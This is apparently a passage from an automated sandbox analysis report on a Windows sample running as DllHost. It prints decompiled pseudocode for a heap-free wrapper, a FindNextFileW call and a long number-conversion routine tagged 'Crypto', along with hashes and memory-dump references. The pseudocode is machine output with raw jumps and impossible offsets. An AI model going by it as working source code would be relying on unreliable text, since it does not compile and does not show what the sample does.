                                                                                                                                                              			E00007FF77FF7191E6B28(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t4;
				void* _t10;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x191e6b64;
				_t14 =  *0x1921be20; // 0x208c7870000, executed
				_t1 = HeapFree(_t10, ??); // executed
				if (_t1 != 0) goto 0x191e6b5f;
				E00007FF77FF7191DC854(__rax);
				_t4 = E00007FF77FF7191DC79C(GetLastError(), __rax, _t14, __rcx);
				 *__rax = _t4;
				return _t4;
			}







                                                                                                                                                              0x7ff7191e6b2b
                                                                                                                                                              0x7ff7191e6b37
                                                                                                                                                              0x7ff7191e6b3e
                                                                                                                                                              0x7ff7191e6b46
                                                                                                                                                              0x7ff7191e6b48
                                                                                                                                                              0x7ff7191e6b58
                                                                                                                                                              0x7ff7191e6b5d
                                                                                                                                                              0x7ff7191e6b64

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: PrivilegeRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 113639715-0
                                                                                                                                                              • Opcode ID: ba752cfe1299c6db07d0eee29e24f197ad01397780a44255d7037dab472f6f0e
                                                                                                                                                              • Instruction ID: 4bcb6be20efa2ed9917f4093b19e09def778fdf2b5faa5b4f07ddb8a2708fbf4
                                                                                                                                                              • Opcode Fuzzy Hash: ba752cfe1299c6db07d0eee29e24f197ad01397780a44255d7037dab472f6f0e
                                                                                                                                                              • Instruction Fuzzy Hash: 09D0A741F19C0643FF59BFA2780013481761F987A8FC44830C91C51151ED0C64DF6520
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191D08EC Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • FindNextFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,FFFFFFFF,?,?,00000000,00007FF7191BB533), ref: 00007FF7191D08F0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileFindNext
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2029273394-0
                                                                                                                                                              • Opcode ID: d58f433f6114c0440ad6ed4d206ede844564032550680f30e4580e32145411b4
                                                                                                                                                              • Instruction ID: d28560dd5df454db315b235b266bd8eee0a5f596186a1919d96051e9350cd144
                                                                                                                                                              • Opcode Fuzzy Hash: d58f433f6114c0440ad6ed4d206ede844564032550680f30e4580e32145411b4
                                                                                                                                                              • Instruction Fuzzy Hash: 0AC04C25F59D06C1F6587F727C4652552F56B44764FC04130C20D81150EE5CA1DFAB31
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Non-executed Functions

                                                                                                                                                              Function 00007FF7191F22C8 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1219COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                              			E00007FF77FF7191F22C8(void* __edx, signed int __rcx, long long __r8, signed int __r9) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __r13;
				void* _t507;
				void* _t519;
				void* _t527;
				signed long long _t536;
				signed int _t560;
				intOrPtr _t566;
				signed long long _t594;
				signed int _t602;
				intOrPtr _t609;
				signed long long _t636;
				void* _t644;
				signed int _t668;
				intOrPtr _t672;
				signed int _t719;
				signed int _t727;
				intOrPtr _t729;
				signed int _t734;
				signed long long _t736;
				signed long long _t742;
				signed long long _t748;
				intOrPtr _t777;
				signed int _t802;
				signed int _t804;
				signed int _t807;
				signed int _t808;
				void* _t809;
				void* _t813;
				void* _t815;
				void* _t820;
				void* _t850;
				void* _t856;
				signed long long _t966;
				signed long long _t968;
				intOrPtr _t973;
				signed long long _t974;
				void* _t976;
				signed long long _t978;
				signed long long _t979;
				signed long long _t980;
				signed long long _t981;
				signed long long _t983;
				void* _t986;
				intOrPtr* _t987;
				signed long long _t998;
				void* _t1001;
				signed long long _t1008;
				long long _t1029;
				void* _t1045;
				signed long long _t1053;
				signed long long _t1054;
				long long _t1061;
				signed long long _t1065;
				long long _t1075;
				signed long long _t1079;
				signed long long _t1083;
				void* _t1084;
				signed long long _t1085;
				signed long long _t1090;
				signed long long _t1091;
				char* _t1092;
				void* _t1093;
				signed long long _t1094;
				void* _t1097;
				void* _t1098;
				signed long long _t1099;
				signed long long _t1104;
				signed long long _t1105;
				signed long long _t1106;
				signed long long _t1117;
				signed long long _t1118;
				signed long long _t1133;
				signed long long _t1134;
				signed long long _t1145;
				signed long long _t1146;
				void* _t1147;
				long long _t1160;
				void* _t1161;

				_t1146 = __r9;
				_t1097 = _t1098 - 0x6d8;
				_t1099 = _t1098 - 0x7d8;
				_t966 =  *0x192190a0; // 0x590452ce5669
				 *(_t1097 + 0x6c0) = _t966 ^ _t1099;
				 *(_t1099 + 0x38) = __rcx;
				_t1094 = __r9;
				 *((long long*)(_t1099 + 0x68)) = __r9;
				_t1160 = __r8;
				 *((long long*)(_t1099 + 0x78)) = __r8;
				E00007FF77FF7191F5EE4(_t809, _t1099 + 0x58, _t1147);
				r12d = 0;
				if (( *(_t1099 + 0x58) & 0x0000001f) != 0x1f) goto 0x191f232b;
				 *((intOrPtr*)(_t1099 + 0x60)) = r12b;
				goto 0x191f233a;
				_t507 = E00007FF77FF7191F5F54(( *(_t1099 + 0x58) & 0x0000001f) - 0x1f, _t1099 + 0x58, _t1085, __r9);
				 *((char*)(_t1099 + 0x60)) = 1;
				_t968 =  *(_t1099 + 0x38);
				 *((long long*)(__r8 + 8)) = __r9;
				r9d = 0x7ff;
				_t13 = _t978 + 0xd; // 0x2d
				_t734 = _t13;
				_t676 =  <  ? _t734 : 0x20;
				 *((intOrPtr*)(__r8)) =  <  ? _t734 : 0x20;
				if (_t968 != 0) goto 0x191f2387;
				if ((0xffffffff & _t968) != 0) goto 0x191f2387;
				 *(__r8 + 4) = r12d;
				goto 0x191f34c6;
				_t813 = (_t968 >> 0x00000034 & __r9) - __r9;
				if (_t813 == 0) goto 0x191f2391;
				goto 0x191f23d2;
				if (_t813 != 0) goto 0x191f23a0;
				goto 0x191f23ca;
				if (_t968 >= 0) goto 0x191f23bb;
				_t815 = (_t968 & 0xffffffff) - 0;
				if (_t815 != 0) goto 0x191f23bb;
				goto 0x191f23ca;
				 *(__r8 + 4) = 1;
				if (_t815 == 0) goto 0x191f34db;
				if (_t815 == 0) goto 0x191f34bf;
				if (_t815 == 0) goto 0x191f34b6;
				if (0 == 1) goto 0x191f34ad;
				 *(_t1099 + 0x38) = _t968 & 0xffffffff;
				_t777 = __edx + 1;
				asm("movsd xmm0, [esp+0x38]");
				 *((intOrPtr*)(_t1099 + 0x50)) = _t777;
				asm("movsd [esp+0x48], xmm0");
				_t1053 =  *((intOrPtr*)(_t1099 + 0x48));
				_t1104 = _t1053 >> 0x34;
				asm("dec eax");
				_t1054 = _t1053 & 0xffffffff;
				_t998 =  ~(_t1104 & __r9);
				asm("sbb eax, eax");
				r8d = r8d & r9d;
				r15d = __r9 + 0;
				r15d = r15d + r8d;
				0x191f6070();
				E00007FF77FF7191F5FA4(_t507, _t1104);
				asm("cvttsd2si ecx, xmm0");
				 *((intOrPtr*)(_t1097 - 0x7c)) = _t777;
				asm("inc ebp");
				r13d = r13d & 0;
				 *((intOrPtr*)(_t1097 - 0x78)) = _t777;
				 *(_t1099 + 0x40) = r13d;
				asm("sbb edx, edx");
				_t736 =  ~_t734 + 1;
				 *(_t1097 - 0x80) = _t736;
				if (r15d - 0x434 < 0) goto 0x191f2729;
				 *(_t1097 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1097 + 0x324)) = 0;
				 *(_t1097 + 0x320) = 2;
				if (_t777 == 0) goto 0x191f2606;
				r8d = r12d;
				if ( *((intOrPtr*)(_t1097 + 0x324 + _t998 * 4)) !=  *(_t1097 + _t998 * 4 - 0x7c)) goto 0x191f2606;
				r8d = r8d + 1;
				_t820 = r8d - 2;
				if (_t820 != 0) goto 0x191f24c7;
				r11d = _t1161 - 0x432;
				 *(_t1099 + 0x38) = r12d;
				r8d = r11d;
				r11d = r11d & 0x0000001f;
				r8d = r8d >> 5;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				r15d = 1;
				r15d =  !r15d;
				if (_t820 == 0) goto 0x191f2521;
				goto 0x191f2524;
				_t519 = _t1054 + _t1104;
				if (_t519 != 0x73) goto 0x191f2536;
				if (r11d - 0x20 > 0) goto 0x191f2539;
				r12d = r12d | 0xffffffff;
				if (_t519 - 0x73 > 0) goto 0x191f25d2;
				if (r12b != 0) goto 0x191f25d2;
				r14d = 0x72;
				r14d =  <  ? _t519 : r14d;
				r10d = r14d;
				if (r14d == r12d) goto 0x191f25b2;
				if (r10d - r8d < 0) goto 0x191f25b2;
				if (r10d - r8d - _t736 >= 0) goto 0x191f257c;
				r9d =  *(_t1097 + 0x3fffffffffff84);
				goto 0x191f257f;
				r9d = 0;
				if (0xfffffffffffff - _t736 >= 0) goto 0x191f2589;
				goto 0x191f258b;
				r9d = r9d & 0;
				r10d = r10d + r12d;
				r9d = r9d << r11d;
				 *(_t1097 + 0x3fffffffffff84) = (0 & r15d) >> 0x00000020 - r11d | r9d;
				if (r10d == r12d) goto 0x191f25b2;
				_t742 =  *(_t1097 - 0x80);
				goto 0x191f2563;
				if (r8d == 0) goto 0x191f25c5;
				 *(_t1097 + _t998 * 4 - 0x7c) =  *(_t1097 + _t998 * 4 - 0x7c) & 0x00000000;
				if (1 != r8d) goto 0x191f25b9;
				r14d =  >  ? __r8 + 1 : r14d;
				goto 0x191f25d5;
				r14d = 0;
				 *(_t1097 + 0x328) =  *(_t1097 + 0x328) & 0x00000000;
				r15d = 1;
				 *(_t1097 + 0x150) = r15d;
				 *(_t1097 - 0x80) = r14d;
				 *(_t1097 + 0x320) = 1;
				 *(_t1097 + 0x154) = 4;
				goto 0x191f2928;
				r11d = _t1161 - 0x433;
				 *(_t1099 + 0x38) = r12d;
				r8d = r11d;
				r11d = r11d & 0x0000001f;
				r8d = r8d >> 5;
				_t1090 = (_t1085 & 0x00000000) + _t1054 >> 0x20 << 0x20 << 0x20;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				r15d = 1;
				r15d =  !r15d;
				if (r11d == 0x20) goto 0x191f2644;
				goto 0x191f2647;
				_t527 = _t1054 + _t1104;
				if (_t527 != 0x73) goto 0x191f2659;
				if (r11d - 0x20 > 0) goto 0x191f265c;
				r12d = r12d | 0xffffffff;
				if (_t527 - 0x73 > 0) goto 0x191f26f5;
				if (r12b != 0) goto 0x191f26f5;
				r14d = 0x72;
				r14d =  <  ? _t527 : r14d;
				r10d = r14d;
				if (r14d == r12d) goto 0x191f26d5;
				if (r10d - r8d < 0) goto 0x191f26d5;
				if (r10d - r8d - _t742 >= 0) goto 0x191f269f;
				r9d =  *(_t1097 + 0x3fffffffffff84);
				goto 0x191f26a2;
				r9d = 0;
				if (0xfffffffffffff - _t742 >= 0) goto 0x191f26ac;
				goto 0x191f26ae;
				r9d = r9d & 0x00000001;
				r10d = r10d + r12d;
				r9d = r9d << r11d;
				 *(_t1097 + 0x3fffffffffff84) = (0 & r15d) >> 0x00000020 | r9d;
				if (r10d == r12d) goto 0x191f26d5;
				_t748 =  *(_t1097 - 0x80);
				goto 0x191f2686;
				if (r8d == 0) goto 0x191f26e8;
				 *(_t1097 + _t998 * 4 - 0x7c) =  *(_t1097 + _t998 * 4 - 0x7c) & 0x00000000;
				if (1 != r8d) goto 0x191f26dc;
				r14d =  >  ? __r8 + 1 : r14d;
				goto 0x191f26f8;
				r14d = 0;
				 *(_t1097 + 0x328) =  *(_t1097 + 0x328) & 0x00000000;
				r15d = 1;
				 *(_t1097 + 0x150) = r15d;
				 *(_t1097 - 0x80) = r14d;
				 *(_t1097 + 0x320) = 1;
				 *(_t1097 + 0x154) = 2;
				goto 0x191f2928;
				if (r15d == 0x36) goto 0x191f285c;
				 *(_t1097 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1097 + 0x324)) = 0;
				 *(_t1097 + 0x320) = 0x20;
				if (0 == 0) goto 0x191f285c;
				r8d = r12d;
				if ( *((intOrPtr*)(_t1097 + 0x324 + _t998 * 4)) !=  *(_t1097 + _t998 * 4 - 0x7c)) goto 0x191f285c;
				r8d = r8d + 1;
				_t850 = r8d - 0x20;
				if (_t850 != 0) goto 0x191f2756;
				asm("bsr eax, edi");
				 *(_t1099 + 0x38) = r12d;
				if (_t850 == 0) goto 0x191f2780;
				goto 0x191f2783;
				r14d = _t748;
				r12d = r12d | 0xffffffff;
				_t536 = _t748;
				r10d = _t536;
				r8d = 0xfffffffffffff;
				if (_t536 - _t748 >= 0) goto 0x191f27a0;
				r9d =  *(_t1097 + 0x3fffffffffff80);
				goto 0x191f27a3;
				r9d = 0;
				if (r8d - _t748 >= 0) goto 0x191f27af;
				goto 0x191f27b1;
				 *(_t1097 + 0x3fffffffffff80) = 0 >> 0x0000001e | r9d << 0x00000002;
				if (r8d == r12d) goto 0x191f27ce;
				goto 0x191f278e;
				r14d =  <  ? __r8 + 1 : r14d;
				 *(_t1097 - 0x80) = r14d;
				_t979 = _t978 << 2;
				_t1105 = _t979;
				E00007FF77FF7191D4A30(__r8 + 1, 0, _t1097 + 0x324, _t1054, _t1105);
				 *(_t1097 + _t979 + 0x324) = 1 << sil;
				_t118 = _t1090 + 1; // 0x437
				r15d = _t118;
				r8d = r15d;
				_t1106 = _t1105 << 2;
				 *(_t1097 + 0x320) = r15d;
				 *(_t1097 + 0x150) = r15d;
				if (_t1106 == 0) goto 0x191f2928;
				_t856 = _t1106 - _t979;
				if (_t856 > 0) goto 0x191f2907;
				E00007FF77FF7191D4380();
				goto 0x191f2921;
				 *(_t1099 + 0x38) = r12d;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				if (_t856 == 0) goto 0x191f286f;
				goto 0x191f2872;
				r14d = 0;
				r12d = r12d | 0xffffffff;
				r10d = 0;
				r8d = 0xfffffffffffff;
				if (0 >= 0) goto 0x191f288f;
				r9d =  *(_t1097 + 0x3fffffffffff80);
				goto 0x191f2892;
				r9d = 0;
				if (r8d >= 0) goto 0x191f289e;
				goto 0x191f28a0;
				 *(_t1097 + 0x3fffffffffff80) = 0 >> 0x0000001f | _t1146 + _t1146;
				if (r8d == r12d) goto 0x191f28bb;
				goto 0x191f287d;
				_t1001 = _t1097 + 0x324;
				r14d =  <  ? __r8 + 1 : r14d;
				 *(_t1097 - 0x80) = r14d;
				_t980 = _t979 << 2;
				E00007FF77FF7191D4A30(__r8 + 1, 0, _t1001, _t1097 + 0x324, _t980);
				 *(_t1097 + _t980 + 0x324) = 1;
				goto 0x191f2814;
				E00007FF77FF7191D4A30(1 << sil, 0, _t1001, _t1097 + 0x324, _t980);
				E00007FF77FF7191DC854(0);
				 *0 = 0x22;
				E00007FF77FF7191DA5D8();
				r15d =  *(_t1097 + 0x150);
				if (r13d < 0) goto 0x191f2e26;
				_t560 = 0xcccccccd * r13d >> 0x20 >> 3;
				 *(_t1099 + 0x38) = _t560;
				r12d = _t560;
				 *(_t1099 + 0x30) = _t560;
				if (_t560 == 0) goto 0x191f2d29;
				r13d = r12d;
				r13d =  >  ? 0x26 : r13d;
				 *(_t1099 + 0x44) = r13d;
				_t981 = _t980 << 2;
				 *(_t1097 + 0x320) = _t1094 + _t1001;
				E00007FF77FF7191D4A30(_t1094 + _t1001, 0, _t1097 + 0x324, 0x7ff7191b0000, _t981);
				_t1095 = _t1094 << 2;
				E00007FF77FF7191D4380();
				r10d =  *(_t1097 + 0x320);
				if (r10d - 1 > 0) goto 0x191f2a85;
				_t566 =  *((intOrPtr*)(_t1097 + 0x324));
				if (_t566 != 0) goto 0x191f29fc;
				r15d = 0;
				 *(_t1097 + 0x150) = r15d;
				goto 0x191f2cfc;
				if (_t566 == 1) goto 0x191f2cfc;
				if (r15d == 0) goto 0x191f2cfc;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x191f2a17;
				if (r8d == 0) goto 0x191f2a79;
				if ( *(_t1097 + 0x150) - 0x73 >= 0) goto 0x191f2a68;
				 *(_t1097 + 0x40000000000154) = r8d;
				r15d =  *(_t1097 + 0x150);
				r15d = r15d + 1;
				goto 0x191f29f0;
				r15d = 0;
				 *(_t1097 + 0x150) = r15d;
				goto 0x191f2cfe;
				r15d =  *(_t1097 + 0x150);
				goto 0x191f2cfc;
				if (r15d - 1 > 0) goto 0x191f2b3c;
				_t668 =  *(_t1097 + 0x154);
				r15d = r10d;
				 *(_t1097 + 0x150) = r10d;
				if (0 << 2 == 0) goto 0x191f2aeb;
				_t1008 = _t1097 + 0x154;
				if (0 << 2 - 0 > 0) goto 0x191f2aca;
				E00007FF77FF7191D4380();
				goto 0x191f2ae4;
				E00007FF77FF7191D4A30(0x1cc, 0, _t1008, _t1097 + 0x324, 0);
				E00007FF77FF7191DC854(0);
				 *0 = 0x22;
				E00007FF77FF7191DA5D8();
				r15d =  *(_t1097 + 0x150);
				if (_t668 == 0) goto 0x191f29ed;
				if (_t668 == 1) goto 0x191f2cfc;
				if (r15d == 0) goto 0x191f2cfc;
				r8d = 0;
				r9d = 0;
				_t1117 = _t1008 * _t981 + 0 >> 0x20;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x191f2b0e;
				goto 0x191f2a40;
				r12d = r15d;
				_t1159 =  >=  ? _t1097 + 0x154 : _t1097 + 0x324;
				r12d =  <  ? r10d : r12d;
				_t1061 =  >=  ? _t1097 + 0x324 : _t1097 + 0x154;
				 *((long long*)(_t1099 + 0x48)) = _t1061;
				r10d =  !=  ? r15d : r10d;
				r15d = 0;
				r9d = 0;
				 *(_t1097 + 0x4f0) = r15d;
				if (r12d == 0) goto 0x191f2c9f;
				_t802 =  *(( >=  ? _t1097 + 0x154 : _t1097 + 0x324) + _t1146 * 4);
				if (_t802 != 0) goto 0x191f2bbb;
				if (r9d != r15d) goto 0x191f2c93;
				 *(_t1097 + 0x4f4 + _t1146 * 4) =  *(_t1097 + 0x4f4 + _t1146 * 4) & _t802;
				_t213 = _t1146 + 1; // 0x1
				r15d = _t213;
				 *(_t1097 + 0x4f0) = r15d;
				goto 0x191f2c93;
				r11d = 0;
				r8d = r9d;
				if (r10d == 0) goto 0x191f2c84;
				if (r8d == 0x73) goto 0x191f2c32;
				if (r8d != r15d) goto 0x191f2bef;
				 *(_t1097 + 0x4f4 + _t1090 * 4) =  *(_t1097 + 0x4f4 + _t1090 * 4) & 0x00000000;
				_t221 = _t1117 + 1; // 0x1
				 *(_t1097 + 0x4f0) = _t221;
				r8d = r8d + 1;
				 *(_t1097 + 0x4f4 + _t1090 * 4) =  *(_t1061 + 0x40000000000000);
				r15d =  *(_t1097 + 0x4f0);
				if (_t1117 + _t981 == r10d) goto 0x191f2c32;
				_t1065 =  *((intOrPtr*)(_t1099 + 0x48));
				goto 0x191f2bcf;
				if (r11d == 0) goto 0x191f2c84;
				if (r8d == 0x73) goto 0x191f2e1a;
				if (r8d != r15d) goto 0x191f2c5b;
				 *(_t1097 + 0x4f4 + _t1065 * 4) =  *(_t1097 + 0x4f4 + _t1065 * 4) & 0x00000000;
				_t241 = _t1117 + 1; // 0x1
				 *(_t1097 + 0x4f0) = _t241;
				r8d = r8d + 1;
				_t719 = r11d;
				 *(_t1097 + 0x4f4 + _t1065 * 4) = _t719;
				r15d =  *(_t1097 + 0x4f0);
				r11d = _t719;
				if (_t719 != 0) goto 0x191f2c37;
				if (r8d == 0x73) goto 0x191f2e1a;
				r9d = r9d + 1;
				if (r9d != r12d) goto 0x191f2b8e;
				r8d = r15d;
				_t1118 = _t1117 << 2;
				 *(_t1097 + 0x150) = r15d;
				if (_t1118 == 0) goto 0x191f2cf2;
				if (_t1118 - 0 > 0) goto 0x191f2cd1;
				E00007FF77FF7191D4380();
				goto 0x191f2ceb;
				E00007FF77FF7191D4A30(0x1cc, 0, _t1097 + 0x154, _t1097 + 0x4f4, 0);
				E00007FF77FF7191DC854(0);
				 *0 = 0x22;
				E00007FF77FF7191DA5D8();
				r15d =  *(_t1097 + 0x150);
				r12d =  *(_t1099 + 0x30);
				r13d =  *(_t1099 + 0x44);
				if (1 == 0) goto 0x191f2e1a;
				r12d = r12d - r13d;
				 *(_t1099 + 0x30) = r12d;
				if (1 != 0) goto 0x191f295d;
				r13d =  *(_t1099 + 0x40);
				if (1 == 0) goto 0x191f2dba;
				_t594 =  *0x407FF719205028;
				if (_t594 == 0) goto 0x191f2e1a;
				if (_t594 == 1) goto 0x191f2dba;
				if (r15d == 0) goto 0x191f2dba;
				r8d = 0;
				r10d = _t594;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r15d) goto 0x191f2d5e;
				if (r8d == 0) goto 0x191f2db3;
				if ( *(_t1097 + 0x150) - 0x73 >= 0) goto 0x191f2e1a;
				 *(_t1097 + 0x40000000000154) = r8d;
				r15d =  *(_t1097 + 0x150);
				r15d = r15d + 1;
				goto 0x191f2e1d;
				r15d =  *(_t1097 + 0x150);
				_t1091 =  *((intOrPtr*)(_t1099 + 0x68));
				r12d = 0;
				if (r14d == 0) goto 0x191f3298;
				r8d = r12d;
				r9d = r12d;
				r9d = r9d + 1;
				 *(_t1097 + 0x1ffdc646bff84) = r8d;
				if (r9d != r14d) goto 0x191f2dd4;
				if (r8d == 0) goto 0x191f3298;
				if ( *(_t1097 - 0x80) - 0x73 >= 0) goto 0x191f3275;
				 *(_t1097 + 0x3fffffffffff84) = r8d;
				 *(_t1097 - 0x80) =  *(_t1097 - 0x80) + 1;
				goto 0x191f3298;
				r15d = 0;
				 *(_t1097 + 0x150) = r15d;
				goto 0x191f2dba;
				r13d =  ~r13d;
				_t602 =  *(_t1097 - 0x80) * r13d >> 0x20 >> 3;
				 *(_t1099 + 0x44) = _t602;
				r12d = _t602;
				 *(_t1099 + 0x30) = _t602;
				if (_t602 == 0) goto 0x191f31dd;
				_t604 =  >  ? 0x26 : r12d;
				 *(_t1099 + 0x38) =  >  ? 0x26 : r12d;
				_t983 = _t1091 << 2;
				 *(_t1097 + 0x320) = (_t1094 << 2) + 0x50000000000000;
				E00007FF77FF7191D4A30((_t1094 << 2) + 0x50000000000000, 0, _t1097 + 0x324, 0x7ff7191b0000, _t983);
				E00007FF77FF7191D4380();
				r10d =  *(_t1097 + 0x320);
				if (r10d - 1 > 0) goto 0x191f2f59;
				_t609 =  *((intOrPtr*)(_t1097 + 0x324));
				if (_t609 != 0) goto 0x191f2ee8;
				r14d = 0;
				 *(_t1097 - 0x80) = r14d;
				goto 0x191f31b3;
				if (_t609 == 1) goto 0x191f31b3;
				if (r14d == 0) goto 0x191f31b3;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r14d) goto 0x191f2f03;
				if (r8d == 0) goto 0x191f2f50;
				if ( *(_t1097 - 0x80) - 0x73 >= 0) goto 0x191f2f42;
				 *(_t1097 + 0x3fffffffffff84) = r8d;
				r14d =  *(_t1097 - 0x80);
				r14d = r14d + 1;
				goto 0x191f2edf;
				r14d = 0;
				 *(_t1097 - 0x80) = r14d;
				goto 0x191f31b5;
				r14d =  *(_t1097 - 0x80);
				goto 0x191f31b3;
				if (r14d - 1 > 0) goto 0x191f2ffe;
				_t672 =  *((intOrPtr*)(_t1097 - 0x7c));
				r14d = r10d;
				 *(_t1097 - 0x80) = r10d;
				if (0 << 2 == 0) goto 0x191f2fb3;
				if (0 << 2 - 0 > 0) goto 0x191f2f95;
				E00007FF77FF7191D4380();
				goto 0x191f2faf;
				E00007FF77FF7191D4A30(0x1cc, 0, _t1097 - 0x7c, _t1097 + 0x324, 0);
				E00007FF77FF7191DC854(0);
				 *0 = 0x22;
				E00007FF77FF7191DA5D8();
				r14d =  *(_t1097 - 0x80);
				if (_t672 == 0) goto 0x191f2edc;
				if (_t672 == 1) goto 0x191f31b3;
				if (r14d == 0) goto 0x191f31b3;
				r8d = 0;
				r9d = 0;
				r9d = r9d + 1;
				if (r9d != r14d) goto 0x191f2fd6;
				goto 0x191f2f26;
				r12d = r14d;
				_t1029 =  >=  ? _t1097 - 0x7c : _t1097 + 0x324;
				_t1133 = _t1097 + 0x324;
				r12d =  <  ? r10d : r12d;
				 *((long long*)(_t1099 + 0x70)) = _t1029;
				_t1075 =  >=  ? _t1133 : _t1097 - 0x7c;
				 *((long long*)(_t1099 + 0x48)) = _t1075;
				r10d =  !=  ? r14d : r10d;
				r14d = 0;
				r9d = 0;
				 *(_t1097 + 0x4f0) = r14d;
				if (r12d == 0) goto 0x191f3164;
				_t804 =  *(_t1029 + _t1146 * 4);
				if (_t804 != 0) goto 0x191f307b;
				if (r9d != r14d) goto 0x191f3158;
				 *(_t1097 + 0x4f4 + _t1146 * 4) =  *(_t1097 + 0x4f4 + _t1146 * 4) & _t804;
				_t369 = _t1146 + 1; // 0x1
				r14d = _t369;
				 *(_t1097 + 0x4f0) = r14d;
				goto 0x191f3158;
				r11d = 0;
				r8d = r9d;
				if (r10d == 0) goto 0x191f3144;
				if (r8d == 0x73) goto 0x191f30f2;
				if (r8d != r14d) goto 0x191f30af;
				 *(_t1097 + 0x4f4 + _t1091 * 4) =  *(_t1097 + 0x4f4 + _t1091 * 4) & 0x00000000;
				_t377 = _t1133 + 1; // 0x1
				 *(_t1097 + 0x4f0) = _t377;
				r8d = r8d + 1;
				 *(_t1097 + 0x4f4 + _t1091 * 4) =  *(_t1075 + 0x40000000000000);
				r14d =  *(_t1097 + 0x4f0);
				if (_t983 + _t1133 == r10d) goto 0x191f30f2;
				_t1079 =  *((intOrPtr*)(_t1099 + 0x48));
				goto 0x191f308f;
				if (r11d == 0) goto 0x191f3144;
				if (r8d == 0x73) goto 0x191f3264;
				if (r8d != r14d) goto 0x191f311b;
				 *(_t1097 + 0x4f4 + _t1079 * 4) =  *(_t1097 + 0x4f4 + _t1079 * 4) & 0x00000000;
				_t397 = _t1133 + 1; // 0x1
				 *(_t1097 + 0x4f0) = _t397;
				_t727 =  *(_t1097 + 0x4f4 + _t1079 * 4);
				r8d = r8d + 1;
				 *(_t1097 + 0x4f4 + _t1079 * 4) = _t727;
				r14d =  *(_t1097 + 0x4f0);
				r11d = _t727;
				if (_t727 != 0) goto 0x191f30f7;
				if (r8d == 0x73) goto 0x191f3264;
				r9d = r9d + 1;
				if (r9d != r12d) goto 0x191f304f;
				r8d = r14d;
				_t1134 = _t1133 << 2;
				 *(_t1097 - 0x80) = r14d;
				if (_t1134 == 0) goto 0x191f31ae;
				if (_t1134 - 0 > 0) goto 0x191f3190;
				E00007FF77FF7191D4380();
				goto 0x191f31aa;
				E00007FF77FF7191D4A30(0x1cc, 0, _t1097 - 0x7c, _t1097 + 0x4f4, 0);
				E00007FF77FF7191DC854(0);
				 *0 = 0x22;
				E00007FF77FF7191DA5D8();
				r14d =  *(_t1097 - 0x80);
				r12d =  *(_t1099 + 0x30);
				if (1 == 0) goto 0x191f3264;
				r12d = r12d -  *(_t1099 + 0x38);
				 *(_t1099 + 0x30) = r12d;
				if (1 != 0) goto 0x191f2e50;
				r13d = r13d - 0xa0000000000000;
				if (1 == 0) goto 0x191f2dba;
				_t636 =  *0x407FF719205028;
				if (_t636 == 0) goto 0x191f3264;
				if (_t636 == 1) goto 0x191f2dba;
				if (r14d == 0) goto 0x191f2dba;
				r8d = 0;
				r10d = _t636;
				r9d = 0;
				_t729 =  *((intOrPtr*)(_t1097 + _t1146 * 4 - 0x7c));
				 *((intOrPtr*)(_t1097 + _t1146 * 4 - 0x7c)) = _t729;
				r9d = r9d + 1;
				if (r9d != r14d) goto 0x191f3215;
				if (r8d == 0) goto 0x191f325b;
				if ( *(_t1097 - 0x80) - 0x73 >= 0) goto 0x191f3264;
				 *(_t1097 + 0x3fffffffffff84) = r8d;
				r14d =  *(_t1097 - 0x80);
				r14d = r14d + 1;
				 *(_t1097 - 0x80) = r14d;
				goto 0x191f2dba;
				r14d =  *(_t1097 - 0x80);
				goto 0x191f2dba;
